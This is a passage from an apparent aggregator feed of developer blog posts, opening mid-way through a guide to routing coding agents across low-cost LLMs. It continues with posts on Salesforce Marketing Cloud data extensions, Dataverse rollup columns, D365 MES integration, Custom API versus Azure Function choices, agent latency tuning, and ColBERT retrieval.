| MiniMax M2.5 | — | $0.03 | up to 100K/month | — |

*(Requests per 5-hour window calculated at roughly 2,500 average tokens per request.)*

Note:Kimi K2.6 original series was discontinued on May 25, 2026. The model itself stays available but the series is no longer receiving updates. DeepSeek V4 Pro's promotional pricing ($0.435/M) ends May 31 — after that the price increases, which changes the requests-per-window math.

Claude Opus 4.7 at 87.6% is genuinely the strongest model available for coding tasks right now, 7 points above V4 Pro. But at $5/M tokens, it costs 35x more than DeepSeek V4 Flash per token. Within the $12/5hr window, you get around 480 Opus 4.7 requests vs 17,000 Flash requests.

DeepSeek V4 Flash sits within one point of V4 Pro in benchmark performance but at about 3x lower cost per token. For most routine coding tasks, that gap does not show up in practice. V4 Flash runs 284B total parameters with 13B active. V4 Pro runs 1.6T total with 49B active.

Kimi K2.6 is a 1-trillion-parameter MoE model with 32B active parameters, 80.2% SWE-Bench Verified. That puts it above Qwen3.6 Plus and close to V4 Pro, making it the right choice for genuinely hard multi-step reasoning when V4 Flash stalls.

GLM-5.1 sits at 744B total / 40B active. Its 200K context makes it suitable for deep planning tasks, and it handles the Oracle and Prometheus roles well at a mid-range cost point.

## How Oh My OpenAgent is structured

Oh My OpenAgent v4.2.3 (as of May 2026, with 48K+ GitHub stars) uses a 3-layer architecture:

**Planning Layer** handles strategic decomposition and knowledge synthesis. Two agents: Prometheus (breaks down what needs to happen) and Metis (synthesizes context and prior knowledge).

**Orchestration Layer** is Atlas. It maintains a todo-list, enforces sequencing, and tracks completion. It does not do the work itself. It manages what gets done in what order.

**Execution Layer** is where the work happens. Sisyphus is the default orchestrator with a 32K extended thinking budget. Nine or more specialized agents handle specific task types.

v4.0.0 introduced Team Mode, which activates 7 additional hooks (61 total vs 54 in standard mode). Team Mode is worth enabling if you are running parallel workstreams. It is off by default.

## The routing configuration

This is the community-recommended agent-to-model assignment. It is the result of a lot of trial and error, not theory:

| Agent | Primary Model | Fallback |
|---|---|---|
| Sisyphus | Kimi K2.6 | DeepSeek V4 Pro, then Qwen3.6 Plus |
| Hephaestus | DeepSeek V4 Pro | DeepSeek V4 Flash, then Kimi K2.6 |
| Oracle | GLM-5.1 | Kimi K2.6, then DeepSeek V4 Pro |
| Librarian | DeepSeek V4 Flash | Qwen3.5 Plus |
| Explore | DeepSeek V4 Flash | none |
| Prometheus | GLM-5.1 | Qwen3.6 Plus, then DeepSeek V4 Pro |
| Metis | Qwen3.6 Plus | DeepSeek V4 Pro |
| Atlas | DeepSeek V4 Pro | DeepSeek V4 Flash |
| Code-reviewer | Kimi K2.6 | DeepSeek V4 Pro |
| Multimodal-Looker | MiMo-V2.5-Pro | Qwen3.6 Plus |

Sisyphus gets Kimi K2.6 because it runs extended thinking at up to 32K tokens. You want the strongest reasoning model here, even at lower volume. Kimi's 256K context window handles long execution traces.

Librarian and Explore get V4 Flash. These agents read docs, fetch context, and do lookup work. They do not need frontier-level reasoning. Wasting V4 Pro on Librarian is the single most common budget mistake I see.

Oracle and Prometheus both get GLM-5.1. Planning and deep reasoning are where GLM-5.1 earns its slot. It is not the cheapest model, but it is not the most expensive either, and it performs well on the kinds of open-ended decomposition tasks these agents handle.

Hephaestus (the primary coding agent) gets V4 Pro as primary with V4 Flash as fallback. The gap between them is small enough that on simpler coding tasks, falling back to Flash costs you nothing visible.

MiMo-V2.5-Pro on Multimodal-Looker is deliberate. It scored 78.9% on SWE-Bench Verified and is specifically designed for agentic workflows.

## The routing decision rule

Route through V4 Flash first for any task that will exceed 100 requests. Escalate to Kimi K2.6 or V4 Pro only if V4 Flash gets stuck.

This works because V4 Flash at 79.0% SWE-Bench Verified handles the majority of real-world coding tasks correctly. The one-point gap to V4 Pro is real but rarely shows up unless you are hitting genuinely hard tickets. When it does, the fallback chain handles it.

Do not escalate preemptively. Let the model fail first, then escalate. Preemptive escalation is how you burn through your window in an hour.

## What $10/month actually buys

At $60/month hard cap (the monthly ceiling), here is the math:

- ~5 active hours per day across 5 working days = 25 hours of active window time
- Each 5-hour window: $12 budget
- Routed correctly, a typical Oh My OpenAgent session on a medium-complexity feature might use 400-600 requests, weighted toward V4 Flash and Qwen3.5 Plus

In practice: you can run 8-12 substantial coding sessions per month before feeling the ceiling. For individual developer use, $10/month is genuinely enough. OpenCode hit 150K GitHub stars in May 2026 in part because that math works out.

The realistic comparison: Claude API at similar quality levels would cost $150-300/month for the same volume. That is where the 10-20x cost reduction claim comes from, and in my experience it holds.

## The honest trade-off

The gap between this stack and Claude Opus 4.7 on real-world bug fixes is about 7 percentage points. That is real. Some tickets require multiple iterations where Claude would have gotten it right once. Budget for that.

The 7-point gap is an average across all task types. On well-scoped tickets with clear acceptance criteria, the gap narrows significantly. The routing configuration is specifically designed to escalate to Kimi K2.6 or V4 Pro on the tasks where that gap is most likely to show up.

Where this stack genuinely struggles: ambiguous requirements, complex multi-file refactors with implicit dependencies, and tasks that require understanding undocumented system behavior. On those, premium models earn their cost. The routing configuration handles this by putting Kimi K2.6 on the hardest tasks, but Kimi has a 256K context window vs Qwen3.6 Plus's 1M, so very long context tasks may require a different allocation.

## The actual configuration

Two files control everything: `opencode.json`

at your project root, and `.omc/config.json`

for Oh My OpenAgent routing.

`opencode.json`

```
{
  "$schema": "https://opencode.ai/config.schema.json",
  "theme": "opencode",
  "autoshare": false,
  "model": "deepseek-v4-flash",
  "providers": {
    "opencode": {
      "models": [
        "deepseek-v4-pro",
        "deepseek-v4-flash",
        "kimi-k2.6",
        "glm-5.1",
        "qwen3.6-plus",
        "qwen3.5-plus",
        "mimo-v2.5-pro",
        "minimax-m2.5"
      ]
    }
  }
}
```

The `"model"`

field sets your default. V4 Flash is the right default because it handles most tasks at lowest cost.

`.omc/config.json`

```
{
  "version": "4.2.3",
  "teamMode": false,
  "agents": {
    "sisyphus": {
      "model": "kimi-k2.6",
      "fallback": ["deepseek-v4-pro", "qwen3.6-plus"],
      "thinkingBudget": 32000
    },
    "hephaestus": {
      "model": "deepseek-v4-pro",
      "fallback": ["deepseek-v4-flash", "kimi-k2.6"]
    },
    "oracle": {
      "model": "glm-5.1",
      "fallback": ["kimi-k2.6", "deepseek-v4-pro"]
    },
    "prometheus": {
      "model": "glm-5.1",
      "fallback": ["qwen3.6-plus", "deepseek-v4-pro"]
    },
    "metis": {
      "model": "qwen3.6-plus",
      "fallback": ["deepseek-v4-pro"]
    },
    "atlas": {
      "model": "deepseek-v4-pro",
      "fallback": ["deepseek-v4-flash"]
    },
    "librarian": {
      "model": "deepseek-v4-flash",
      "fallback": ["qwen3.5-plus"]
    },
    "explore": {
      "model": "deepseek-v4-flash",
      "fallback": []
    },
    "code-reviewer": {
      "model": "kimi-k2.6",
      "fallback": ["deepseek-v4-pro"]
    },
    "multimodal-looker": {
      "model": "mimo-v2.5-pro",
      "fallback": ["qwen3.6-plus"]
    }
  },
  "routing": {
    "escalationPolicy": "on-failure",
    "budgetAlert": 10.00,
    "windowBudget": 12.00
  }
}
```

`escalationPolicy: "on-failure"`

enforces the core rule: models escalate only when the primary fails, not preemptively. `budgetAlert`

triggers a warning at $10 so you know you have $2 left in the window before the ceiling hits.

## Quick start

```
# Install OpenCode Go
npm install -g opencode

# Install Oh My OpenAgent
npx omc install oh-my-openagent

# Create opencode.json and .omc/config.json from the templates above, then:
omc init --preset oh-my-openagent
# Check your current window spend
opencode usage --window current
```

Knowing where you are in the $12 window changes how aggressively you escalate to premium models.

For a deeper walkthrough of the original configuration approach, the guide that got me started is Jatin Malik's post: [OpenCode Go + Oh My OpenAgent: The Complete Guide to SOTA Model Routing Without Hitting Limits](https://medium.com/@jatinkrmalik/opencode-go-oh-my-openagent-the-complete-guide-to-sota-model-routing-without-hitting-limits-49fdc8cb3417)

---
## Seven Types of Data Extensions We Use on SFMC Projects

> Published: 2026-05-24 02:52:26+00:00
> Source: https://dev.to/sapotacorp/seven-types-of-data-extensions-we-use-on-sfmc-projects-83o
> wpnews: https://wpnews.pro/news/seven-types-of-data-extensions-we-use-on-sfmc-projects

The article summarizes seven types of Data Extensions (DEs) in Salesforce Marketing Cloud (SFMC), including Sendable DEs for email campaigns, Lookup DEs for reference data, Filtered DEs for point-and-click segmentation (which require manual refreshing), Random Split DEs for A/B testing, Shared DEs for cross-Business Unit access, Send Log DEs for tracking email sends, and DEs with Retention Policies for auto-purging old data. It emphasizes that understanding these distinctions—such as not using a Lookup DE for sending or forgetting to refresh a Filtered DE—prevents costly architecture mistakes. The article concludes that most projects use a mix of these types, and correctly identifying the DE type before creation saves significant time versus fixing errors later.

"Data Extension" is the generic term, but SFMC supports several DE types with different behaviors. Knowing the distinctions saves you from trying to send email from a lookup DE or forgetting to refresh a Filtered DE before a campaign.
Here's the reference we hand to every new engineer.
The main type used for sending email. Requirements:
This is the DE you pick when you send a campaign or set up a Journey with Data Extension entry source. No send can happen without one.
Reference data that AMPscript Lookup() pulls into email templates at render time. Common examples:
Not sendable, no EmailAddress field needed. Used by the email, not as the source of the send.
A DE created by applying a Data Filter to another DE - point-and-click segmentation without SQL. Example: "subscribers from Master_DE where MemberTier = Gold" produces a Gold-only Filtered DE.
Important: Filtered DEs need to be refreshed to reflect the current state of the source DE. They don't auto-update.
Refresh via:
If the source DE changes (new imports, updates) but the Filtered DE isn't refreshed, the Filtered DE holds stale data. Campaigns targeting it send to outdated segments.
For anything more complex than single-attribute filtering (joins, calculations), use SQL Query Activity writing to a standard DE, not a Filtered DE.
Splits a source DE into N equal random chunks. Use case: A/B/N testing where you need 10 equal groups to test 10 email variants.
No SQL needed. Configure the split percentages in the UI; SFMC assigns rows randomly.
Caveats:
A DE placed in the Shared Data Extensions folder in the parent Business Unit. Multiple child BUs in the Enterprise account can access the DE without copying it.
Use when:
Access permissions are set via Shared Data Extension Permissions - which BUs can read/write.
Watch for unintended cross-BU writes: if two BUs can write to the same Shared DE, coordinate schemas and import schedules.
A special DE that logs every email send - who received what, when, subject line, etc. Useful for:
Created from the TriggeredSendDataExtension template when used with Triggered Sends.
Caveat: Test Sends don't write to Send Log. Only production sends do. If you're testing and expecting the Send Log to populate, it won't.
Any DE can have a retention policy configured on creation:
Use for:
Set retention at creation if possible. Adding it later works but doesn't apply retroactively to existing rows until the next automation evaluation.
NeedDE TypeSend email from this listSendableReference data AMPscript will look upLookupSimple attribute-based segmentFilteredA/B test random splitsRandomCross-BU shared referenceSharedAudit / custom trackingSend LogAuto-purge old dataDE with Retention Policy
Most projects end up with a mix: one or two Sendable DEs, several Lookup DEs, possibly a Shared DE for multi-brand setups, and retention policies on anything transient.
Naming the DE type right in your head before creating it prevents architecture rebuilds. The decision takes seconds; fixing an incorrectly-typed DE after it's been loaded with data can take a day.
Designing SFMC data architecture? Our Salesforce team ships Data Extension layouts, shared-BU patterns, and retention strategies on production engagements. Get in touch ->
See our full platform services for the stack we cover.

---
## Rollup vs calculated columns in Dataverse: the async trap we fell for

> Published: 2026-05-24 02:52:20+00:00
> Source: https://dev.to/sapotacorp/rollup-vs-calculated-columns-in-dataverse-the-async-trap-we-fell-for-1mh1
> wpnews: https://wpnews.pro/news/rollup-vs-calculated-columns-in-dataverse-the-async-trap-we-fell-for

The article explains the critical difference between calculated and rollup columns in Dataverse, highlighting that rollup columns update on a configurable schedule (default every 12 hours, minimum every hour), while calculated columns compute values in real-time when a row is read. The authors describe a real-world scenario where a team mistakenly assumed a rollup column provided real-time totals, leading to stale data on a deal dashboard. They then present three alternatives for achieving current aggregate data: using a plugin to update totals on child record changes, employing a calculated column on child records for read-time aggregation, or adding a manual refresh button to trigger rollup recalculation.

A deal desk dashboard showed the running total of opportunities per account. Total amount per account was a rollup column. Users opened the dashboard, saw a total, made a decision. Then someone added a new opportunity and checked the same account. The account's total did not change.
Fifteen minutes later, refresh - still not changed. An hour later - changed. The rollup column was working exactly as documented, and the team had mistaken it for a real-time aggregate.
Here is the difference between calculated and rollup columns, and the pattern we now use when the dashboard needs to be current.
Calculated column: computes its value every time the row is read. If the column adds two other columns, every time anything loads the row (form view, API call, view row), Dataverse computes the sum. Results are always current because they are re-derived on demand.
Rollup column: computes its value on a schedule. The default schedule is every 12 hours, configurable down to one hour per column. A rollup that sums child record amounts reads the current state of children when the schedule fires, stores the result, and serves that stored value until the next schedule.
Both store their definition (the formula) in the solution. Both look identical to consuming code. The runtime behavior is radically different.
Calculated columns are correct when:
Rollup columns are correct when:
A calculated column that aggregates children is not allowed. Dataverse blocks it - the reason is performance, reading an account would trigger a query across all its opportunities every load. Rollup is the platform's answer: compute the aggregate ahead of time, serve it cached.
Teams who want a rolling total of child records are usually asked for it by a business user who sees the number on a dashboard and expects it to match reality. When a user tells the team "the total on the Account form should show all linked Opportunity amounts," the team builds a rollup column. The dashboard shows the rollup.
The user then creates an opportunity, looks at the account, and the total is stale. From the user's perspective, the number is wrong. From the platform's perspective, the number is accurate for the last time the schedule fired.
The fix is either to lower the user's expectations (the dashboard updates on a schedule) or to change the implementation.
When the aggregate genuinely needs to be current:
Alternative 1: plugin that updates a stored total on every child change.
A post-operation plugin on Opportunity (Create, Update on amount, Delete) recalculates acme_total_opportunities on the parent Account and writes it. Works for modest volumes - an account with 200 opportunities, each updating rarely, is fine. Fails for accounts with 20,000 opportunities updating frequently - every child change becomes a parent write, and the Dataverse execution pipeline starts throttling.
Good for: master-detail relationships with medium fanout.
Alternative 2: calculated column summing via the lookup.
You cannot aggregate children from a parent via a calculated column, but you can compute the child's contribution per row using a calculated column on the child. acme_attributable_amount = IF(acme_is_counted, amount, 0) on Opportunity, then use that in any consumer query. The consumer does the aggregation at read time.
Works for: dashboards that can run FetchXML with aggregate operators (SUM the acme_attributable_amount across children in a single query). Fails if the consumer is a Dataverse form or view that cannot run aggregate queries.
Good for: Power BI reports, custom dashboards, anywhere you control the read query.
Alternative 3: rollup with one-hour schedule plus "Refresh" button.
Keep the rollup for the baseline case. Add a button on the form that explicitly triggers a rollup recalculation via the CalculateRollupField SDK request. User experiences it as "I just added a child, now I hit Refresh, the total updates."
Works for: dashboards with bursty usage patterns - the baseline is acceptable, explicit refresh covers the "just changed it" case.
Good for: sales management screens, deal desk reviews, scenarios where users understand the refresh semantics.
On any project with more than three rollup columns, we audit quarterly:
The audit takes 20 minutes per project. Half the time, at least one rollup can be deleted; a third of the time, at least one schedule needs adjusting.
A rollup of child-record amounts updates when a child is created or its amount changes. It does not update when a child is deleted, until the scheduled refresh fires.
The window between "child deleted" and "rollup refreshed" shows an overstated total. This is especially painful in audit scenarios - a user deletes a duplicate, the total still shows the duplicate's contribution for up to twelve hours.
The fix is either a plugin on the child Delete event (post-operation, trigger a rollup recalculation explicitly via CalculateRollupFieldRequest) or a tighter schedule. We usually go with the plugin when the table supports deletions, because the time-lag is user-visible.
Rollup columns ship with a form tooltip: "This total refreshes every N hours. Click Refresh after adding new records to see updated totals immediately."
The tooltip is one field-description line, it costs nothing to add, and it inoculates the "why is the number stale" ticket that would otherwise land every other week. Every rollup we ship has it. Every one we inherit gets it added on the first pass.

---
## MES integration with D365 Supply Chain: Azure middleware pattern

> Published: 2026-05-24 02:52:14+00:00
> Source: https://dev.to/sapotacorp/mes-integration-with-d365-supply-chain-azure-middleware-pattern-4698
> wpnews: https://wpnews.pro/news/mes-integration-with-d365-supply-chain-azure-middleware-pattern

The article explains that integrating a Manufacturing Execution System (MES) with Dynamics 365 Supply Chain Management requires low-latency, high-throughput, and reliable data flow, which cannot be achieved by batch jobs, OData polling, or direct database triggers due to their documented failure modes. The recommended solution is an Azure middleware pattern using Service Bus for guaranteed messaging, Logic Apps for orchestration, and F&O Business Events for bidirectional, real-time synchronization. This architecture ensures traceability and scalability by maintaining data correlation and supporting high event volumes without lost messages.

Manufacturers running Dynamics 365 Supply Chain Management almost always also run a dedicated Manufacturing Execution System (MES) on the shop floor. Production order updates, inventory movements, quality tests, and traceability data flow between them continuously. The integration has to be low-latency (shop floor runs on seconds, not hours), high-throughput (hundreds of events per minute at peak), and reliable (lost messages mean lost traceability).
Three integration patterns come up in evaluations. Two have documented failure modes.
Nightly batch jobs via Data Management Framework. Designed for bulk data movement, not real-time signaling. Production orders complete hours before D365 knows about it. Real-time inventory view is always lagging. Traceability data arrives after the batches have shipped.
Custom OData polling with a loop that queries MES every few seconds. Introduces polling overhead for no latency benefit, and MES systems aren't typically designed to handle heavy poll loads. Also creates a custom code dependency that needs maintenance.
Database-level triggers on the MES database pushing directly to F&O's database. Breaks supportability completely. D365 F&O is a managed platform - direct database writes aren't supported, aren't upgrade-safe, and will break the next time Microsoft changes schema. Also creates a security nightmare (MES has privileged write access to F&O's database?).
The only answer that fits the requirements is Azure middleware between the two systems.
Logic Apps or Service Bus as middleware between MES and D365, with F&O Business Events on the D365 side.
What each piece does:
Azure Service Bus for the guaranteed-delivery, ordered messaging. Production-order status updates, inventory moves, quality-test results flow through Service Bus queues with FIFO ordering per production order.
Azure Logic Apps for the orchestration where branching and transformation happen. A pick-complete event from MES fires a Logic App that transforms the payload, updates inventory in D365, and triggers the next production-flow message back to MES.
F&O Business Events for the D365-side publishing. When a production order is created, released, or completed in F&O, a business event fires to Service Bus or Event Grid. MES subscribers pick it up.
Custom Services on F&O for the inbound - when MES has a state change D365 needs to record, the Logic App (or Function) calls a custom service endpoint on F&O. Custom services are designed for low-latency targeted writes, unlike data entities which are bulk-optimized.
Traceability is specific in manufacturing - regulators and customers need to know which raw materials went into which finished-goods batch. D365's batch tracking combines with MES's shop-floor batch recording to produce the full lineage. The integration ensures:
The integration isn't just about moving data - it's about keeping the correlation intact under all failure modes.
At manufacturing scale (large plants with multiple lines, each firing events per minute), throughput planning matters:
Manufacturing can't afford lost messages. The architecture carries:
Flows in each direction have different shapes:
MES → D365 (updates ERP from shop floor):
D365 → MES (issues work to shop floor):
Bidirectional correlation:
Not everything is Logic Apps. Sometimes:
Each has a clear use case. Reach for them when the declarative tool hits a limit, not as default.
A working MES-to-D365 integration has:
The pattern is architect-grade because manufacturing systems won't tolerate the simpler options. Azure middleware is the supported, scalable, maintainable middle.

---
## Custom API vs Custom Action vs Azure Function: Dataverse decision

> Published: 2026-05-24 02:52:09+00:00
> Source: https://dev.to/sapotacorp/custom-api-vs-custom-action-vs-azure-function-dataverse-decision-2lo4
> wpnews: https://wpnews.pro/news/custom-api-vs-custom-action-vs-azure-function-dataverse-decision

Here is a factual summary of the article:

The article compares three methods for implementing business logic in Microsoft Dataverse—Custom Actions (legacy), Custom APIs (modern), and Azure Functions—focusing on their latency, cost, concurrency, and maintenance profiles. Custom APIs are recommended for most new Dataverse-heavy operations due to their low latency, inclusion in existing licensing, and first-class integration with Power Automate, while Azure Functions are better suited for long-running or external-dependency-heavy work despite higher latency and separate compute costs. The author provides a decision matrix and practical guidance, including a case study where a Custom API was chosen over Azure Functions for a loyalty rebate calculation triggered on order creation.

A client needs to expose a "calculate the loyalty rebate for this customer" operation. It reads three Dataverse tables, applies some business rules, writes a result. Every consumer - the Dynamics web app, a Power Automate flow, an external integration - should call the same operation.
Three places we could put it. Three different cost, latency, and scale profiles. Here is the matrix we now run on every "new operation" request.
Custom Action (legacy): a process defined in Dataverse that can be invoked through the SDK. Steps are Workflow Activity Actions. Old-school but still widely deployed.
Custom API (modern): the successor to custom actions. Defined as Dataverse entity rows (customapi, customapiRequestParameter, customapiResponseProperty), backed by a plugin that implements the logic. Exposed through the Web API with a typed OpenAPI schema.
Azure Function: fully external .NET function, invoked from Power Automate or direct HTTP. Runs in its own compute, scales separately, has its own pricing.
The three solve overlapping problems. The choice is about latency, cost structure, and who maintains the code.
DimensionCustom ActionCustom APIAzure FunctionLatencyLow (in-process)Low (in-process)Medium (cross-service)Concurrency limitDataverse'sDataverse'sFunction App'sTimeout2 minutes2 minutes10 minutes (Consumption), configurable higherCostIncluded in DataverseIncluded in DataversePer-execution + computeLong-running workNoNoYes (durable functions)External dependency callsLimited (sandbox)Limited (sandbox)Full flexibilityOpenAPI schemaNoYesManualInvocable from flowYesYes (first-class)Yes (HTTP connector)Maintenance.NET + Workflow.NET.NET (preferred)
Custom Action is correct when you are maintaining an existing system that already uses them. For new work, skip them - custom APIs are the modern equivalent with better tooling.
Custom API is correct when:
Azure Function is correct when:
Custom APIs consume Dataverse capacity. A high-volume custom API (tens of thousands of calls per day) is paid for by your existing Dataverse licensing - no incremental per-call charge.
Azure Functions on Consumption plan: $0.000016 per GB-second and $0.20 per million executions. A typical custom function costing 128MB for 300ms runs at roughly $0.00000006 per call. A million calls per month is around $0.25 in compute plus $0.20 in executions - effectively free.
The cost math usually favors custom API for Dataverse-heavy work and Azure Function for external-dependency-heavy work. Mixing the two via a custom API that calls a function (rare pattern) pays both bills.
Custom API gotcha: the plugin that implements a custom API registers against a synthetic "Custom API message" step. Debugging is via plugin trace logs, same as any plugin. Deployment is through the solution. OpenAPI schema is auto-generated from the custom api row definitions - mis-typing a parameter name once in Dataverse and once in the plugin code produces a runtime failure that the solution checker does not catch.
Azure Function gotcha: cold start on Consumption plan can add 2-5 seconds for the first call after idle. For a user-facing interactive call, this is unacceptable. Options: Premium plan (always warm, higher baseline cost), Dedicated App Service plan, or accept the cold-start delay if the call is async.
Authentication gotcha for Azure Function: calling Dataverse from an Azure Function requires auth. The cleanest pattern is a managed identity on the Function App with an application user in Dataverse. Tutorials that use a user's personal credentials in app settings are security incidents waiting to happen.
Requirement: "Calculate and apply a loyalty rebate on every Order created."
Walking the matrix:
Custom API won clearly. Implementation was a plugin registered against a custom API definition, called from both a post-operation plugin on Order Create (synchronous, blocks save) and directly from a Power Automate flow (for retroactive recalculation).
A year later, the client wanted to integrate with an external tax service that takes 3-4 seconds per call. We did not put that in the same custom API - the 2-minute timeout plus the unpredictability of the external service made it fragile. We built a separate Azure Function for the tax call, invoked async from a Power Automate flow. Two tools for two different latency profiles, as it should be.
If the operation stays inside Dataverse, start with a custom API. You get latency, integrated ALM, and zero incremental cost. You can always move it to an Azure Function later if the requirements shift.
If the operation has any external dependency with unpredictable behavior, start with an Azure Function. You get the durability patterns and the 10-minute timeout that the Dataverse sandbox cannot give.
If you find yourself using custom actions for new work, stop. Custom APIs have everything custom actions did plus a schema and better tooling.

---
## Cutting agent latency from 30s to 8s without model swap

> Published: 2026-05-24 02:52:03+00:00
> Source: https://dev.to/sapotacorp/cutting-agent-latency-from-30s-to-8s-without-model-swap-256j
> wpnews: https://wpnews.pro/news/cutting-agent-latency-from-30s-to-8s-without-model-swap

The article describes how a team reduced their AI agent's p95 response latency from 31 seconds to 8 seconds and cut user abandonment by 70% without changing the underlying model. The improvements came from four structural changes: making independent tool calls concurrent (saving 3.3 seconds), removing an unnecessary critic LLM step (saving 3 seconds), and implementing streaming to improve perceived latency. The key insight is that the model itself accounted for only 35% of the total latency, while the remaining 65% came from sequential tool calls, redundant LLM steps, and missing streaming.

A founder pinged us with a UX problem disguised as an engineering question. His team had launched an AI chat product. Users were abandoning the conversation before the agent finished responding. The team had measured p95 response latency at 31 seconds. Their assumption was that they needed to switch to a faster model.
The actual model was responsible for about 35% of the total latency. The other 65% was sequential tool calls, unnecessary intermediate LLM steps, and a missing streaming layer. Switching to a smaller model would have cut maybe 5 seconds off the worst case while degrading response quality.
We made four changes that did not touch the model. P95 latency dropped from 31 seconds to 8 seconds. User abandonment rate dropped 70%. The model stayed the same.
This is the latency stack that most teams either do not measure or do not know how to optimize. Here is the pattern.
Before any optimization, instrument the agent and trace where time is spent. The breakdown for a typical multi-step agent looks something like:
The LLM call portion is hard to optimize without changing the model. The other 50-70% is where most of the win is, and most teams do not look there because the LLM feels like the obvious bottleneck.
The founder's agent had:
Total p95 was 31 seconds. The model was responsible for 11 seconds of that. The other 20 seconds were structural.
The biggest win in most agent systems is making tool calls concurrent.
The founder's agent had a step where it needed to look up the user's account information, the customer's order history, and the related support tickets. The original code did this sequentially:
Total: 5.3 seconds, all wait time.
The fix was async-await with parallel dispatch:
That single change saved 3.3 seconds per request. The actual code change was 8 lines.
The pattern: any time the agent calls multiple tools and the results are independent, those tool calls can run concurrently. Use asyncio.gather in Python, Promise.all in JavaScript. Modern agent frameworks (LangGraph, CrewAI Flows) support this natively.
Audit your agent for serial tool calls that could run in parallel. There is almost always one or two.
The original agent had a planner LLM that generated a plan, then a separate critic LLM that reviewed the plan, then the executor.
The critic was rejecting roughly 8% of plans, which meant 92% of the time it was an extra LLM call (3 seconds) for nothing. And of the 8% it rejected, the planner produced a similar plan on the next iteration anyway, suggesting the critic was not adding much real value.
We removed the critic, kept the planner, and added validation rules instead (does the plan reference real tools, does it have any cycles, does it stay under the step limit). The validation runs in milliseconds, not seconds, and catches the same class of bad plans the critic was catching.
3 seconds saved per request, on average. Quality measured no different on the eval set.
The pattern: every LLM call in the chain should be earning its keep. If a step rejects only a small fraction of inputs and the alternative is a deterministic check, the deterministic check is faster and usually as good.
The original agent waited for the full response to be generated before returning anything to the user. The user saw a loading spinner for 31 seconds, then the full response appeared.
Streaming changes the perceived latency dramatically. The user starts seeing tokens within 1-2 seconds, even if the full response takes 8. The agent is not actually faster, but the UX feels faster, and abandonment rate drops because users get visible feedback.
The implementation is a few lines of code. The OpenAI and Anthropic APIs both support streaming natively. The frontend needs to handle server-sent events (SSE) or websockets. The user experience improvement is large and immediate.
For multi-step agents, you can also stream intermediate progress: "Looking up your account... Checking order history... Generating response..." This is qualitatively different from a spinner. Users will wait 8 seconds for visible progress; they will not wait 8 seconds for a spinner.
Some queries repeat. Some intermediate steps repeat across queries. Both are cacheable.
The founder's agent had a "policy lookup" tool that retrieved from a small KB of company policies. The policies changed maybe once a month. The agent was hitting the KB and running a vector search every time. We added a simple in-memory cache with a 5-minute TTL. The cache hit rate was 35%, saving 0.8 seconds per cached request.
Semantic caching is the more advanced version: cache LLM responses keyed on the embedding of the query. If a new query is semantically similar to a recent one, return the cached response. We use this carefully (only for queries with high confidence and low staleness risk), but it can save 5+ seconds on cache hits.
Aggressive caching: every tool call and every LLM call should be evaluated for cacheability. Most are. Most teams do not bother. The latency improvement compounds.
After all four changes:
User abandonment rate dropped 70% in the first two weeks. Customer satisfaction scores went up. The model and the agent's core logic did not change.
The team's original instinct (switch to a smaller model) would have saved maybe 5 seconds while degrading quality. The structural changes saved 23 seconds while keeping quality the same.
Before approving "switch to a faster model" as the latency fix, walk through:
Most agent systems have 50-70% latency improvement available without touching the primary model. Audit before you swap.
Switching to a smaller, faster model can be the right call for some agents. But it is the last resort, not the first. The cost is response quality, and that cost is permanent. The structural improvements are free.
The pattern Sapota recommends: optimize the structure first, measure the new latency, then decide whether a model swap is still needed. Often it is not. When it is, you have a much smaller gap to close, and the trade-off is more justified.
If your team has launched an AI agent and users are abandoning conversations before the response arrives, the issue is rarely the model. It is usually the structure.
Sapota offers a one-week latency audit that traces your agent's actual time spent, identifies the parallelizable tool calls, the removable LLM steps, and the missing caching opportunities, and ships the optimizations as working code. We have done this for chat products, customer support tools, and research assistants. The typical improvement is 60-75% latency reduction without changing the model.
Reach out via the AI engineering page with your current p95 latency and a sample trace if you have one. If you do not have traces, we will install observability first and audit second.

---
## When recall plateaus: the late-interaction technique most teams skip

> Published: 2026-05-24 02:51:57+00:00
> Source: https://dev.to/sapotacorp/when-recall-plateaus-the-late-interaction-technique-most-teams-skip-54o4
> wpnews: https://wpnews.pro/news/when-recall-plateaus-the-late-interaction-technique-most-teams-skip

The article explains that many teams hit a recall ceiling with RAG systems because they rely on bi-encoder embedding models, which compress entire text chunks into a single vector and lose fine-grained detail. The solution is to use late-interaction techniques like ColBERT, which preserve per-token embeddings and compute relevance through maximum similarity scoring, often boosting recall from 58% to 81% in a single afternoon. The article also describes two deployment patterns for ColBERT—as a reranker over bi-encoder results or as the primary retriever—and notes that ColPali extends this approach to image-based document pages.

A founder we work with had been stuck on the same problem for two months. Their RAG retrieval recall was sitting at 58%. They had tried OpenAI's embedding-3-small, then embedding-3-large, then BGE-M3, then Voyage. Each swap added a couple of points, then the curve flattened. The team was about to start fine-tuning their own embedding model.
We told them to stop and add a reranker first. The number went from 58% to 81% in a single afternoon. The fine-tuning project was cancelled.
This is the moment most teams discover that the bottleneck was never the embedding model. It was the architecture choice of using a single embedding per chunk to begin with. Late interaction is the family of techniques that fixes it, and it is the one most teams skip because the name sounds intimidating.
A bi-encoder (which is what every standard embedding model is) takes a chunk of text, compresses it into a single fixed-length vector, and stores it. At query time, the user's question is also compressed into a single vector, and similarity is computed between the two.
The compression is the problem. A 500-token chunk that mentions five different concepts gets averaged into one vector. The vector represents the chunk roughly, but it loses the distinction between "this chunk is mostly about X with a brief mention of Y" and "this chunk is mostly about Y with a brief mention of X." When the user query is about Y, both chunks look equally relevant by cosine distance, even though one is the right answer and the other is noise.
This is why every benchmark of "best embedding model" shows diminishing returns past a certain point. The embedding model is doing the best it can with the information bottleneck of a single vector. The architecture is the limit.
ColBERT (the original, 2020) keeps the per-token embeddings instead of pooling them into one vector. A 500-token chunk becomes 500 vectors. A 10-token query becomes 10 vectors. At scoring time, you compute the maximum similarity between each query token and any chunk token, then sum those max scores into the final relevance score.
The math is the same dot products you would do for any vector search. The difference is that "how well does this query match this chunk" is now a sum of "for each query token, what is the best matching chunk token," which preserves the fine-grained signal that pooling threw away.
In practice this looks like:
This is what catches the recall ceiling.
Sapota uses ColBERT in two patterns depending on the corpus size and latency budget.
Pattern 1: ColBERT as a reranker over bi-encoder retrieval. The first stage is a standard bi-encoder vector search returning the top 50 candidates. The second stage is ColBERT reranking those 50 down to the top 5. This is the pattern we use for most production deployments. The first stage is fast (millisecond range, scales to billions of vectors). The second stage is slow but only runs on 50 candidates, not the full index.
Pattern 2: ColBERT as the only retriever. For corpora under a few million chunks, ColBERT can be the primary retriever using PLAID or similar index structures that make late-interaction search tractable at scale. Latency is higher than a bi-encoder (10x to 50x depending on index size), but recall is the highest of any retrieval method we have benchmarked.
